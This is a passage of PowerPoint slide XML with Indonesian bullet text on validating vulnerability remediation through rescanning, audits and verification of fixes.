              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>celah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuntabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teridentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaksanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilaksanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diselesaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teridentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengindikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Audit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninjau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selaras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Audit juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teridentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengecualian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengecualian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkonfirmasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> manual, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinjauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
